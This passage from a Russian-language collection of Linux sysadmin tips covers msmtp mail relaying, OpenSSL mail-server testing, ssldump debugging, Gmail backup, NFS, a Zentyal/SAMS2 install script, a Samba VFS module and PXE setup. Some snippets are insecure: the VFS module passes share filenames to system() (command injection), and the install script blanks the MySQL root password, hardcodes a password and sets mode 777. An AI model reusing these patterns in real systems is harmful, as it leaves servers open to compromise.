Системные демоны устанавливаемые на Linux-машинах как правило уведомляют пользователя root о важных событиях происходящих на сервере использую командный интерфейс sendmail или mail. Для того, чтобы системные демоны отправляли почту не на локально настроенный MTA пользователю root@localhost или root@servername а другой адрес email для этого можно: 1. Настроить на использование smarthost локальный mta идущий в стандартной установке ОС, например для Debian это Exim, для Ubuntu - Postfix. Но при этом сам smarthost не должен отбрасывать от вашего сервера почту, что не всегда возможно! 2. Использовать что-то еще ... 3. Использовать msmtp ВАЖНО! Многие smtp требуют чтобы поле "From:" было равно тому, под кем серверу представляется MUA. В достижении этого нам поможет msmtp - мощный почтовый консольный клиент (MUA) с интерфейсом sendmail. Одно из очень необходимых качеств которого является умение заменять Отправителя на Отправителя указанного в конфигурации /etc/msmtprc Поэтому его очень легко использовать в качестве MUA отправляющего почту администратору сервера через SMTP популярных почтовых провайдеров, например smtp.yandex.ru, smtp.google.ru и т.д. Для достижения поставленной цели на Debian based системах необходимо выполнить следующие шаги : 1. Устанавливаем msmtp aptitude -R -y install msmtp 2. Редактируем /etc/msmtprc defaults account default host smtp.yandex.ru port 25 auth on tls on tls_starttls on tls_certcheck off user user@example.com password adminplaintextpassword from admin@example.com logfile msmtp.log Параметр tls_certcheck off используется для упрощения статьи, в дальнейшем можно будет его включить, но при этом необходимо будет произвести определенные действия с сертификатами удаленного сервера и их размещении на вашем клиенте. Что усложняет процесс настройки. 3. Делаем символическую ссылку, чтобы программы использующие стандартный интерфейс файла sendmail, использовали при этом msmtp. а не например установленный exim, postfix, nullmailer и т.д. Для Debian/Ubuntu: update-alternatives --install /usr/sbin/sendmail sendmail /usr/bin/msmtp 10 Для остальных систем смыл действия сводится к использованию аналогичных средств для замены симлинка (ln -s /usr/bin/msmtp /usr/sbin/sendmail). 4. Проверяем отправку стандартным способом через команду sendmail или mail 5. Настраиваем, например, mdadm, smartd через указание в конфигах нужного email администратора. Примечание: в mdadm.conf можно указать только один email Проверить отправку почты mdadm можно командой: mdadm --monitor --scan --test --oneshot Проверить отправку почты smartd можно отредактировав /etc/smartd.conf обязательно добавив параметры "-m admin@example.com" и "-M test" в строку конфигурации, например: DEVICESCAN ... -m admin@tech-club.ru -M test ... DEVICESCAN - для всех устройств в системе. и выполнив перезапуск smartd invoke-rc.d smartmontools restart

Использование OpenSSL для тестирования POP3, IMAP, SMTP, WEB сервера с TLS/SSL/SASL (доп. ссылка 1) [комментарии]

Для тестирования работы TLS/SSL на POP3 сервере можно использовать входящий в состав OpenSSL клиент s_client (для тестирования SSL-клиентов по аналогии можно использовать s_server): openssl s_client -connect имя_хоста:995 после чего можно сэмулировать типичную POP3-сессию: +OK Dovecot ready. user логин +OK pass пароль +OK Logged in. выводим список сообщений на сервере и их размер: list +OK 2 messages: 1 1759 2 12422 читаем первое сообщение: retr 1 +OK 1759 octets заголовки и текст Тестирование IMAP проводится в соответствии с теми же принципами: openssl s_client -connect imap_хост:993 CONNECTED(00000003) .... * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE AUTH=PLAIN AUTH=LOGIN] Dovecot ready. login логин пароль a001 OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR ... CONTEXT=SEARCH LIST-STATUS QUOTA] Logged in выводим список папок: a002 list "" "*" * LIST (\HasChildren) "." "INBOX" * LIST (\HasNoChildren) "." "INBOX.INBOX_Trash" * LIST (\HasNoChildren) "." "INBOX.Trash" * LIST (\HasNoChildren) "." "INBOX.read" * LIST (\HasNoChildren) "." "INBOX.Queue" * LIST (\HasNoChildren) "." "INBOX.INBOX_Drafts" посмотрим содержимое папки Inbox: a003 examine inbox * FLAGS (\Answered \Flagged \Deleted \Seen \Draft Junk NonJunk) * OK [PERMANENTFLAGS ()] Read-only mailbox. * 10 EXISTS * 0 RECENT * OK [UNSEEN 1] First unseen. * OK [UIDVALIDITY 1291459647] UIDs valid * OK [UIDNEXT 8026] Predicted next UID * OK [HIGHESTMODSEQ 2710] Highest a003 OK [READ-ONLY] Select completed. В папке 10 сообщений, выведем содержимое текста четвертого сообщения, без заголовков: a004 4 rfc822.text * 4 FETCH (RFC822.TEXT {857} текст a005 OK Fetch completed. выходим a005 logout * BYE Logging out a005 OK Logout completed. Тестируем сайт по SHTTP: openssl s_client -connect www.test.com:443 GET / HTTP/1.1 Host: test.com Проверяем SASL-аутентификацию при отправке почты: openssl s_client -connect smtp_хост:25 -starttls smtp 220 mail.test.com ESMTP Postfix EHLO test.test.com 250-mail.test.com 250-PIPELINING 250-SIZE 10240000 250-ETRN 250-AUTH DIGEST-MD5 PLAIN CRAM-MD5 250 8BITMIME AUTH PLAIN пароль_в_base64_нотации 235 Authentication successful Перекодировать файл с паролем в base64-представление можно командой: openssl enc -base64 -in file.txt -out mfile.b64 декодировать: openssl enc -d -base64 -in file.b64 -out file.txt Другие полезные команды: Шифруем файл симметричным шифром blowfish (если необходимо сохранение в base64-представлении добавляем опцию "-a"): openssl enc -e -salt -bf -in file.txt -out file.blowfish enter bf-cbc encryption password: пароль расшифровываем: openssl enc -d -bf -in file.blowfish -out file.txt enter bf-cbc decryption password: пароль Рассчитываем SHA1-хэш для файла: openssl dgst -sha1 -c file.txt SHA1(test.txt)= 15:85:f1:af:a7:ca:1c:1c:5a:8b:c3:a7:1e:7f:4b:bd:3c:d4:22:ca Для перехвата и расшифровки SSL/TLS трафика в отладочных целях можно использовать утилиту ssldump: наблюдение за активностью внутри SSL-сессии: ssldump -a -A -H -i eth0 со служебными данными для полной отладки SSL-сессии: ssldump -a -A -H -k server.pem -i eth0 для расшифровки содержимого сессии: ssldump -d -k server.pem -i eth0 Для успешной расшифровки SSL-сессия должна быть перехвачена с самого начала, включая момент обмена ключами на стадии инициирования сессии.

Резервное копирование почтового ящика Gmail в Linux [комментарии]

Вариант 1. GUI интерфейс. Загружаем с сайта http://www.gmail-backup.com/download программу gmail-backup. Убедимся, что в системе установлен Python 2.5, библиотеки wxWidgets и модуль wxPython (в Debian/Ubuntu пакеты python2.5 python-wxversion). Активируем "Включить IMAP" в настройках Gmail доступ через IMAP (Settings / Forwarding and POP/IMAP или Настройки / Пересылка и POP/IMAP). Для начала резервного копирования запускаем GUI интерфейс и вводим необходимые параметры аккаунта: ./gmail-backup-gui.sh Автоматизировать загрузку резервных копий можно через поставляемый в комплекте с gmail-backup скрипт: ./gmail-backup.sh backup имя_папки user@gmail.com пароль Для выборочного бэкапа нужно использовать: ./gmail-backup.sh backup dir user@gmail.com password 20070621 20080101 Для восстановления данных: ./gmail-backup.sh restore dir user@gmail.com password Для копирования только новых данных, накопившихся с момента прошлого бэкапа: ./gmail-backup.sh backup dir user@gmail.com password --stamp Как видно у скрипта имеется существенная проблема - необходимость указания пароля прямо в командной строке, что с точки зрения безопасности неприемлимо. Исправить ситуацию не получается, пакет распространяется только в бинарном виде. Вариант 2. Использование пакета getmail: Ставим getmail (http://pyropus.ca/software/getmail/): sudo apt-get install getmail4 Создаем 2 директории: .getmail для хранения настроек и директорию gmail-archive для хранения бэкапа. mkdir ~/.getmail mkdir ~/gmail-backup Создаем файл конфигурации ~/.getmail/getmail.gmail: [retriever] type = SimpleIMAPSSLRetriever server = imap.gmail.com username = user@gmail.com password = password [destination] type = Maildir path = ~/gmail-backup/ # Если вместо maildir нужно использовать формат mbox: # type = Mboxrd # path = ~/gmail-backup/gmail.mbox [options] verbose = 2 message_log = ~/.getmail/gmail.log Запускаем копирование писем: getmail -r ~/.getmail/getmail.gmail

Отправка gmail почти через msmtp (доп. ссылка 1) Автор: Roman Y. Bogdanov [комментарии]

Проблема. Хожу я с ноутбуком по разным местам. Разные провайдеры. Разные настройки. Необходимо с ноутбука доставлять почту для мира. Ноутбук работает под FreeBSD. Как решить проблему? Ответ очень простой. Нужно установить пакет msmtp. Он занимается доставкой почты от клиента к серверу. Правильно назвать это будет MDA - Mail Delivery Agent. У меня есть почта в системе google. Собственно через smtp gmail я и буду делать доставку. Сначала необходимо установить msmtp. Вот файл настроек: $ cat .msmtprc account default host smtp.gmail.com port 587 protocol smtp auth on from mylogin@gmail.com user mylogin@gmail.com password пароль tls on tls_starttls on

Как прикрепить 48x48 иконку к письму (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Содержимое черно-белой 48x48 иконки передается через заголовк X-Face, цветной - Face (PNG картинка, размером после base64 кодирования не больше 998 байт, разбивка по 79 символов в строке). Скрипт для преобразования Jpeg в "Face:" #!/bin/bash jpg=$1 png=$2 if [ "$jpg" = "" -o "$png" = "" ]; then echo "Usage: make-face <JPG-FILE> <BASE64-FILE>" exit fi quant=16 found=false tmp=/tmp/make-face.$$.tmp while [ "$found" = "false" ]; do echo -n "Trying quantization $quant ($jpg)..." djpeg "$jpg"\ | ppmnorm\ | pnmscale -width 48 -height 48\ | ppmquant $quant\ | pnmtopng\ | mimencode > $tmp size=`ls -l $tmp | awk '{ print $5; }'` if [ $size -lt 993 ]; then echo -n "Face:" > "$png" for i in `cat $tmp`; do echo -n " " >> "$png" echo "$i" >> "$png" done rm $tmp found=true echo "done" else quant=`expr $quant - 2` echo "too big ($size)" fi done

Как послать письмо с аттачем из shell (доп. ссылка 1) Автор: Vadim Fedorov [комментарии]

metasend -b -s "$SUBJECT" -f $TXTFILE -m text/plain -e none -n \ -f $ATTFILE -m application/octet-stream -e base64 -t $MAILTO mpack -s "$SUBJECT" -c application/octet-stream $ATTFILE $MAILTO mutt -a $ATTFILE -s "$SUBJECT" $MAILTO < $TXTFILE

Как из командной строки послать письмо с приаттаченным файлом [обсудить]

metasend В зависимости от типа файла, в качестве Content-type пишем: application/gzip application/zip application/postscript image/jpeg image/png audio/basic audio/mpeg3 audio/wav

Как отправить все сообщения из mailbox на другой email [комментарии]

cat /var/spool/mail/user_name | formail -s sendmail some@email Во FreeBSD утилита formail идет в комплекте с портом procmail

Уведомления о свежей почте в conky, dzen и xmobar Автор: Andrey Bortnik [комментарии]

Ниже описан способ отображения в conky, dzen, xmobar и т.п. уведомления о наличии свежей почты в maildir. Преимущества данного способа: 1) он выдержан в стиле unix way, 2) не требует обращаться к жёсткому диску чаще, чем это необходимо. Описание относится к Arch Linux, но процедура достаточно проста, чтобы легко перенести её на любую систему с достаточно свежим ядром Linux. Идея в том, что появление свежей почты отслеживается посредством incron; при появлении нового сообщения вызывается скрипт mailstat.sh (см. ниже), который считает новые сообщения в maildir, наблюдаемых incron-ом, формирует текст-уведомление для пользователя и выдаёт это сообщение в именованный канал. Со своей стороны, к примеру, conky читает из того же именованного канала и отображает сообщение. Скрипт пишет в канал многократно, в бесконечном цикле, чтобы сообщение не пропадало из conky; при запуске очередного экземпляра скрипта он прибивает все предыдущие. Итак, предположим, у нас Arch Linux с пользователем moses и его maildir-ами /home/moses/Mail/work, /home/moses/Mail/club, куда периодически скачивается почта с POP3-сервера. moses хочет узнавать о наличии свежей почты как можно скорее, но не хочет поминутно лазить в почтовый клиент - он предпочёл бы видеть уведомления на панели xmobar. Вообще говоря, maildir-ов может быть больше, но moses хочет видеть уведомления только об этих. Устанавливаем incron. > sudo pacman -S incron Разрешаем moses-у использовать incron. > sudo vim /etc/incron.allow moses Создаём скрипт mailstat.sh. vim ~/scripts/mailstat.sh #!/bin/bash TARGET=/tmp/mailstat IT=mailstat # определяем отслеживаемые maildir-ы DIRS=`incrontab -l | grep $IT | awk '{print $1;}' | sort -u` # подсчитываем свежие сообщения в maildir-ах T="" for d in $DIRS do c=`find $d -type f | wc -l` if [[ $c -gt 0 ]]; then T=$T`echo $d | sed -e 's/\/new$//' | sed -e 's/^.*\///'`": "$c" " fi done # прибиваем ранее запущенные экземпляры скрипта PIDS=`ps -eo pid,comm | grep $IT | grep -v $$ | awk '{print $1;}'` for p in $PIDS do if [[ $p != $$ ]]; then kill -9 $p 2>/dev/null fi done # создаём именованный канал if [ ! -e $TARGET ]; then mkfifo $TARGET fi # пишем сообщение в канал while true ; do echo $T > $TARGET done Запускаем incron. > sudo /etc/rc.d/incrond start Настраиваем incron. > incrontab -e /home/moses/Mail/work/new IN_CREATE,IN_DELETE,IN_MOVED_FROM /home/moses/scripts/mailstat.sh /home/moses/Mail/club/new IN_CREATE,IN_DELETE,IN_MOVED_FROM /home/moses/scripts/mailstat.sh Убеждаемся, что изменения возымели действие. > incrontab -l Передёргиваем incron. > incrontab -d Настраиваем xmobar для отображения уведомлений. > vim ~/.xmobarrc Config { font = "-xos4-terminus-medium-r-normal--12-120-72-72-c-60-*-*" , bgColor = "black" , fgColor = "grey" , position = Top , lowerOnStart = True , commands = [ Run Com "timeout" ["1 tail -n 1 /tmp/mailstat"] "mail" 5 , Run StdinReader ] , sepChar = "%" , alignSep = "}{" , template = "%StdinReader%}{ <fc=#ee9a00>%mail%</fc>" } Настраиваем автозапуск incron. > sudo vim /etc/rc.conf DAEMONS=(@metalog network @crond @incrond)

NFS

Настройка NFS сервера и NFS клиента под FreeBSD и Linux [комментарии]

NFS сервер (FreeBSD): /etc/rc.conf: portmap_enable="YES" nfs_server_enable="YES" nfs_reserved_port_only="YES" /etc/exports (man exports): /usr/local/nfs -rw 192.168.1.2 /usr/local/nfs -ro -mapall=nobody -network 192.168.1 -mask 255.255.255.0 /cdrom -alldirs,quiet,ro -network 192.168.33.0 -mask 255.255.255.0 Для Linux /etc/exports будет выглядеть примерно так (запуск - service start portmap и nfs): /usr/local/nfs 192.168.1.0/255.255.255.0(ro) 192.168.2.1(rw) NFS клиент: /etc/rc.conf: portmap_enable="YES", nfs_client_enable="YES" /etc/fstab: 192.168.1.1:/usr/local/nfs /home/nfs nfs ro 0 0 или вручную: /sbin/mount_nfs -r 32768 -w 32768 -i noatime 192.168.1.1:/usr/local/nfs /home/nfs Для оптимизации производительности рекомендуется при монтировании в Linux указывать параметры: rsize=32768,wsize=32768,intr,noatime Число запущенных клиентов и серверов под FreeBSD регулируется через параметр "-n" в переменных rc.conf: nfs_client_flags и nfs_server_flags В некоторых Linux дистрибутивах число серверов задается в файле /etc/sysconfig/nfs, переменная NFSDCOUNT, значение которой передается как аргумент при запуске rpc.nfsd.

Samba

Ubuntu как сервер Zentyal + MyDLP + Webmin + SAMS2 Автор: Валерий [комментарии]

Скрипт для автоматизации установки и запуска связки Zentyal + MyDLP + Webmin + SAMS2 в Ubuntu Linux. Скрипт запускается с правами root и рассчитан на работу в Ubuntu 12.04. Для других систем скрипт может использоваться как заметка о том, что не забыть при установке. #!/bin/sh # INSTALL SCRIPT PROXY ALLURGROUP export DEBIAN_FRONTEND=noninteractive echo "INSTALL DLP COMPLETE" wget -q http://keys.zentyal.org/zentyal-3.2-archive.asc -O- | apt-key add - apt-get install -y -q python-software-properties add-apt-repository -y ppa:zentyal/3.2 apt-get update DEBIAN_FRONTEND=noninteractive apt-get -y -q install zentyal DEBIAN_FRONTEND=noninteractive apt-get -y -q --force-yes install language-pack-zentyal-ru echo "ZENTYAL INSTALL COMPLETE PLEASE GO TO HTTPS://IP:4443" sed 's/443/4443/' /var/lib/zentyal/conf/nginx.conf > /var/lib/zentyal/conf/nginx.conf.new & sleep 5 mv /var/lib/zentyal/conf/nginx.conf.new /var/lib/zentyal/conf/nginx.conf sleep 5 killall nginx netstat -an | grep 443 echo "use mysql;" > proxy.sql echo 'update user set password=PASSWORD("")' "where User='root';" >> proxy.sql echo "flush privileges;" >> proxy.sql echo "quit" >> proxy.sql /etc/init.d/mysql stop & sleep 5 mysqld_safe --skip-grant-tables & sleep 5 mysql -u root < proxy.sql & sleep 5 /etc/init.d/mysql stop & sleep 5 /etc/init.d/mysql start & sleep 5 echo "deb ftp://ftp.linux.org.tr/mydlp/ubuntu precise main" >> /etc/apt/sources.list apt-get update DEBIAN_FRONTEND=noninteractive apt-get -y -q --force-yes install mydlp mydlp-appliance echo 'LANG=ru_RU.UTF-8' > /etc/default/locale echo 'LANGUAGE=ru_RU.UTF-8' >> /etc/default/locale echo 'LC_CTYPE="ru_RU.UTF-8"' >> /etc/default/locale echo 'LC_NUMERIC="ru_RU.UTF-8"' >> /etc/default/locale echo 'LC_TIME="ru_RU.UTF-8"' >> /etc/default/locale echo 'LC_COLLATE="ru_RU.UTF-8"' >> /etc/default/locale echo 'LC_MONETARY="ru_RU.UTF-8"' >> /etc/default/locale echo 'LC_MESSAGES="ru_RU.UTF-8"' >> /etc/default/locale echo 'LC_PAPER="ru_RU.UTF-8"' >> /etc/default/locale echo 'LC_NAME="ru_RU.UTF-8"' >> /etc/default/locale echo 'LC_ADDRESS="ru_RU.UTF-8"' >> /etc/default/locale echo 'LC_TELEPHONE="ru_RU.UTF-8"' >> /etc/default/locale echo 'LC_MEASUREMENT="ru_RU.UTF-8"' >> /etc/default/locale echo 'LC_IDENTIFICATION="ru_RU.UTF-8"' >> /etc/default/locale echo 'LC_ALL=ru_RU.UTF-8' >> /etc/default/locale echo "deb http://download.webmin.com/download/repository sarge contrib" >> /etc/apt/sources.list wget http://www.webmin.com/jcameron-key.asc apt-key add jcameron-key.asc DEBIAN_FRONTEND=noninteractive apt-get -y -q --force-yes update DEBIAN_FRONTEND=noninteractive apt-get -y -q --force-yes install webmin DEBIAN_FRONTEND=noninteractive apt-get -y -q --force-yes install make g++ libtool build-essential autoconf automake ssl-cert \\ libmysqlclient-dev libpcre3 libpcre3-dev php5 php5-cli php5-common php5-dev php5-mcrypt \\ php5-imagick php5-mysql php5-gd php5-ldap php-fpdf libapache2-mod-php5 libldap2-dev DEBIAN_FRONTEND=noninteractive apt-get -y -q --force-yes install krb5-user krb5-config libkrb53 krb5-locales libgssapi-krb5-2 DEBIAN_FRONTEND=noninteractive apt-get -y -q --force-yes install samba samba-common winbind DEBIAN_FRONTEND=noninteractive apt-get -y -q --force-yes install ntp sed 's/0.ubuntu.pool.ntp.org/192.168.10.10/g;s/1.ubuntu.pool.ntp.org/192.168.10.12/g;s/2.ubuntu.pool.ntp.org/192.168.12.10/g;s/3.ubuntu.pool.ntp.org/192.168.12.11/g' /etc/ntp.conf > /etc/ntp.conf.new & sleep 5 mv /etc/ntp.conf.new /etc/ntp.conf & sleep 5 /etc/init.d/ntp restart & sleep 5 echo '[global]' > /etc/samba/smb.conf echo 'dos charset = 866' >> /etc/samba/smb.conf echo 'unix charset = UTF-8' >> /etc/samba/smb.conf echo 'display charset = CP1251' >> /etc/samba/smb.conf echo 'security = ADS' >> /etc/samba/smb.conf echo 'workgroup = ALLURAUTO' >> /etc/samba/smb.conf echo 'realm = example.com' >> /etc/samba/smb.conf echo 'winbind uid = 10000-20000' >> /etc/samba/smb.conf echo 'winbind gid = 10000-20000' >> /etc/samba/smb.conf echo 'winbind enum users = yes' >> /etc/samba/smb.conf echo 'winbind enum groups = yes' >> /etc/samba/smb.conf echo 'winbind use default domain = yes' >> /etc/samba/smb.conf echo 'local master = no' >> /etc/samba/smb.conf echo 'client use spnego = yes' >> /etc/samba/smb.conf echo 'ntlm auth = yes' >> /etc/samba/smb.conf echo 'client ntlmv2 auth = yes' >> /etc/samba/smb.conf echo 'log file = /var/log/samba/log.%m' >> /etc/samba/smb.conf echo 'max log size = 1000' >> /etc/samba/smb.conf echo 'syslog = 0' >> /etc/samba/smb.conf echo '' >> /etc/samba/smb.conf echo '[downloads]' >> /etc/samba/smb.conf echo ' comment = MyDLP Appliance Downloads' >> /etc/samba/smb.conf echo ' path = /usr/share/mydlp/endpoint' >> /etc/samba/smb.conf echo ' read only = yes' >> /etc/samba/smb.conf echo ' guest ok = yes' >> /etc/samba/smb.conf echo ' public = yes' >> /etc/samba/smb.conf echo ' browsable = yes' >> /etc/samba/smb.conf echo ' writable = no' >> /etc/samba/smb.conf echo '[libdefaults]' >> /etc/krb5.conf echo 'default_realm = example.com' >> /etc/krb5.conf echo 'clockskew = 300' >> /etc/krb5.conf echo 'ticket_lifetime = 24000' >> /etc/krb5.conf echo '# The following krb5.conf variables are only for MIT Kerberos.' >> /etc/krb5.conf echo 'krb4_config = /etc/krb.conf' >> /etc/krb5.conf echo 'krb4_realms = /etc/krb.realms' >> /etc/krb5.conf echo 'kdc_timesync = 1' >> /etc/krb5.conf echo 'ccache_type = 4' >> /etc/krb5.conf echo 'forwardable = true' >> /etc/krb5.conf echo 'proxiable = true' >> /etc/krb5.conf echo'' >> /etc/krb5.conf echo '[realms]' >> /etc/krb5.conf echo ' example.com = {' >> /etc/krb5.conf echo ' kdc = rwdc01.example.com' >> /etc/krb5.conf echo ' kdc = rwdc02.example.com' >> /etc/krb5.conf echo ' admin_server = rwdc01.example.com' >> /etc/krb5.conf echo ' default_domain = example.com' >> /etc/krb5.conf echo ' }' >> /etc/krb5.conf echo '' >> /etc/krb5.conf echo ' [domain_realm]' >> /etc/krb5.conf echo ' .example.com = example.com' >> /etc/krb5.conf echo ' example.com = example.com' >> /etc/krb5.conf echo '' >> /etc/krb5.conf echo '[login]' >> /etc/krb5.conf echo ' krb4_convert = true' >> /etc/krb5.conf echo ' krb4_get_tickets = false' >> /etc/krb5.conf echo '' >> /etc/krb5.conf echo '[logging]' >> /etc/krb5.conf echo 'kdc = FILE:/var/log/krb5/krb5kdc.log' >> /etc/krb5.conf echo 'admin_server = FILE:/var/log/krb5/kadmind.log' >> /etc/krb5.conf echo 'default = SYSLOG:NOTICE:DAEMON' >> /etc/krb5.conf DEBIAN_FRONTEND=noninteractive apt-get -y -q --force-yes install squid3-common mkdir -p /var/run/samba/winbindd_privileged/ chgrp proxy /var/run/samba/winbindd_privileged/ chmod 0750 /var/run/samba/winbindd_privileged/ /etc/init.d/winbind restart mkdir squidsrc cd squidsrc wget http://sams2.googlecode.com/files/sams-2.0.0-rc2.tar.bz2 tar xvjf sams-2.0.0-rc2.tar.bz2 cd sams-2.0.0-rc2 source /etc/apache2/envvars make -f Makefile.cvs ./configure sed -i -e '6000s/absdir=.*/absdir="\\/usr\\/lib"/' libtool cd src mv samsuser.h samsuser.kmp mv dbquery.h dbquery.kmp mv template.h template.kmp mv logger.h logger.kmp mv urlgroup.h urlgroup.kmp mv squidlogline.h squidlogline.kmp mv dbconn.h dbconn.kmp mv proxy.h proxy.kmp ls -la *.kmp sed 's/enum usrStatus/enum usrStatus : long/' samsuser.kmp > samsuser.h sed 's/enum VarType/enum VarType : long/' dbquery.kmp > dbquery.h sed 's/enum PeriodType/enum PeriodType : long/' template.kmp > template.h sed 's/enum LogKind/enum LogKind : long/g;s/enum LoggerEngine/enum LoggerEngine : long/g' logger.kmp > logger.h sed 's/enum accessType/enum accessType : long/' urlgroup.kmp > urlgroup.h sed 's/enum logCacheResult/enum logCacheResult : long/g;s/enum logPeerStatus/enum logPeerStatus : long/g;s/enum logHTTPStatus {/enum logHTTPStatus : long {/g' squidlogline.kmp > squidlogline.h sed 's/enum DBEngine/enum DBEngine : long/' dbconn.kmp > dbconn.h sed 's/enum TrafficType/enum TrafficType : long/g;s/enum usrAuthType/enum usrAuthType : long/g;s/enum RedirType/enum RedirType : long/g;s/enum ParserType/enum ParserType : long/g;s/enum CharCase/enum CharCase : long/g' proxy.kmp > proxy.h cd .. make make install sed -i -e 's/DB_USER=/DB_USER=sams/' /usr/local/etc/sams2.conf sed -i -e 's/DB_PASSWORD=/DB_PASSWORD='Meteor2014'/' /usr/local/etc/sams2.conf sed -i -e 's/squid/squid3/' /usr/local/etc/sams2.conf sed -i -e 's|SQUIDCACHEDIR=/usr/local/apache2|SQUIDCACHEDIR=/var/spool/squid3|' /usr/local/etc/sams2.conf chown -R www-data:www-data /usr/local/share/sams2/ chown -R www-data:www-data /usr/local/etc/sams2.conf chmod -R 777 /usr/local/share/sams2 echo ' Alias /sams2 /usr/local/share/sams2/ <Directory "/usr/local/share/sams2/"> Options Indexes FollowSymlinks AllowOverride None Require all granted AddDefaultCharset off </Directory> <Location "/sams2"> Options Indexes Order allow,deny Allow from all </Location> ' > /etc/apache2/sites-available/sams2.conf echo ' Alias /sams2/doc /usr/local/share/doc/sams2-2.0.0/ <Directory "/usr/local/share/doc/sams2-2.0.0/"> Options Indexes FollowSymlinks AllowOverride None Require all granted AddDefaultCharset off </Directory> <Location "/sams2/doc"> Options Indexes Order allow,deny Allow from all </Location> ' > /etc/apache2/sites-available/doc4sams2.conf ln -s ../sites-available/sams2.conf /etc/apache2/sites-enabled/ ln -s ../sites-available/doc4sams2.conf /etc/apache2/sites-enabled/ ln -s ../sites-available/default /etc/apache2/sites-enabled/default sed 's/*:80/127.0.0.1:80' /etc/apache2/sites-available/mydlp > /etc/apache2/sites-available/mydlpnew sleep 5 mv /etc/apache2/sites-available/mydlpnew > /etc/apache2/sites-available/mydlp sleep 5 service apache2 restart

Создание собственного модуля Samba VFS Автор: Andrey [комментарии]

Задача Необходимо выполнить ряд действий при добавлении/изменении файла в разделе Samba. Реализация Создадим собственный VFS-модуль для Samba, отслеживающий добавление/изменение файлов. vfs_custom.c: #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include "includes.h" #include "system/filesys.h" #include "system/syslog.h" #include "smbd/smbd.h" #undef DBGC_CLASS #define DBGC_CLASS DBGC_VFS static int custom_close(vfs_handle_struct *handle, files_struct *fsp) { int result; result = SMB_VFS_NEXT_CLOSE(handle, fsp); const char* path = lp_pathname(SNUM(fsp->conn)); const char* script = lp_parm_const_string(SNUM(handle->conn), "custom", "modify", NULL); if(script && path && fsp->modified) { struct stat sb; int script_sz = strlen(script); int script_ex = stat(script, &sb) == 0 && sb.st_mode & S_IXUSR; if(script_ex) { int path_sz = strlen(path); const char* bname = fsp->fsp_name->base_name; int bname_sz = strlen(bname); char* buf = (char*) calloc(PATH_MAX + script_sz + 1, 1); if(buf) { strncat(buf, script, script_sz); strncat(buf, " ", 1); strncat(buf, path, path_sz); strncat(buf, "/", 1); strncat(buf, "\\"", 1); strncat(buf, bname, bname_sz); strncat(buf, "\\"", 1); system(buf); free(buf); } } } return result; } static struct vfs_fn_pointers vfs_custom_fns = { .close_fn = custom_close }; NTSTATUS vfs_custom_init(void) { return smb_register_vfs(SMB_VFS_INTERFACE_VERSION, "custom", &vfs_custom_fns); } Я собрал его по аналогии с модулями из директории modules в исходниках Samba. Готовый бинарный файл vfs_custom.o нужно скопировать в рабочую директорию модулей, у мня это было /usr/lib/samba/vfs Настройка vfs_custom: Настройка заключается в редактировании файла конфигурации smb.conf: [share] vfs objects = custom custom:modify = /etc/samba/scripts/modify.sh В результате при добавлении/изменении файла будет выполняться скрипт /etc/samba/scripts/modify.sh filename Например, сейчас мы можем автоматически делать с новыми/измененными файлами что угодно, например уменьшать jpeg картинки если пользователь будет их копировать на шару и т.п. Для того чтобы была реакция на удаление файла необходимо заполнить отдельную секцию в коде .unlink = custom_unlink

Полуавтоматическое разворачивание рабочих станций CentOS в домене MS Active Directory Автор: Дмитрий Казаров [комментарии]

В заметке рассказывается о решении задачи по автоматизации установки новых Linux систем и организации управления ими с помощью Active Directory. Исходные данные:
Домен AD Domain.ru.
Дистрибутив CentOS, легально скачанный с сайта CentOS.org (у руководства сейчас пунктик о 100% легальности софта).
Очень странный софт спец назначения - 64-битный софт с 32-битным установщиком. Процесс организации установки Linux по сети 1. Готовим сервер установки. 1.1 На сервере виртуалок создаём сервер загрузок из того же CentOS-a с отдельным VLAN-ом и IP адресом 172.17.17.254/24 - основная сетка целиком на MS, лучше её не тревожить... Пока. Сразу ставим туда демоны dhcpd, tftp, nfs, ntpd. Машины заливать будем по NFS - так привычнее. 1.2 Настраиваем на виртуальном сервере DHCP под сетевую загрузку Linux. Правим /etc/dhcp/dhcpd.conf до примерно такого вида: option domain-name "centos"; option domain-name-servers 172.17.17.254; default-lease-time 600; max-lease-time 7200; authoritative; log-facility local7; subnet 172.17.17.0 netmask 255.255.255.0 { range 172.17.17.100 172.17.17.199; option routers 172.17.17.254; filename "pxelinux.0"; next-server 172.17.17.254; } В общем - всё как обычно, кроме пары ключевых параметров: filename и next-server. next-server задаёт IP-адрес tftp-сервера, а filename - файл в папке загрузочных файлов (см следующий пункт). включаем загрузку демона chkconfig dhcpd on и запускаем его service dhcpd start 1.3 Настраиваем tftp Правим файл /etc/xinetd.d/tftp. Точнее в строке disabled ставим значение "no" и в строке server_args ставим те значения, что нам привычны, или оставляем исходные, но запоминаем, куда они указывают. Мне, развлекающемуся с юнихами года так с 1989, привычнее там видеть "-s -vv /tftpboot", что собственно там и оказалось, после моих правок. Создаём саму папку для загрузочных файлов (/tftpboot - из параметра server_args): mkdir /tftpboot Ставим пакет syslinux-а yum install syslinux-4.02-7.el6.x86_64 И копируем PXE-шный загрузчкик в выбранное место: cp /usr/share/syslinux/pxelinux.0 /tftpboot И включаем демон: chkconfig xinetd on service xinetd restart 1.4 Настраиваем NFS Создаём папку для дистрибутива mkdir -p /pub/CentOS Распаковываем туда дистрибутив mkdir -p /mnt/cdrom mount -o loop /путь-к-папке-с-изошником-CentOS/CentOS-6.3-x86_64-bin-DVD1.iso /mnt/cdrom cd /pub/CentOS cp -ra /mnt/cdrom/* . umount /mnt/cdrom mount -o loop /путь-к-папке-с-изошником-CentOS/CentOS-6.3-x86_64-bin-DVD2.iso /mnt/cdrom cp -ra /mnt/cdrom/* . umount /mnt/cdrom Открываем к доступ к папке echo '/pub *(ro,insecure,all_squash)' >> /etc/exports chkconfig nfs on service nfs restart С общей подготовкой сервера - всё. Приступаем к специфичной части. 2. CentOS-овский загрузчик. CentOS, разумеется, для загрузки с CD и DVD использует загрузчик isolinux проекта Syslinux. А значит сделать файл конфигурации загрузки для pxelinux.0, другой загрузчик этого же проекта - не просто, а очень просто. Создаём папку /tftpboot/pxelinux.cfg и папку для дополнительных файлов загрузчика. mkdir -p /tftpboot/pxelinux.cfg Копируем туда под именем default файл конфигурации isolinux-а с дистрибутива CentOS... cd /pub/CentOS/isolinux/ cp isolinux.cfg /tftpboot/pxelinux.cfg/default [[/CODE]] ...и 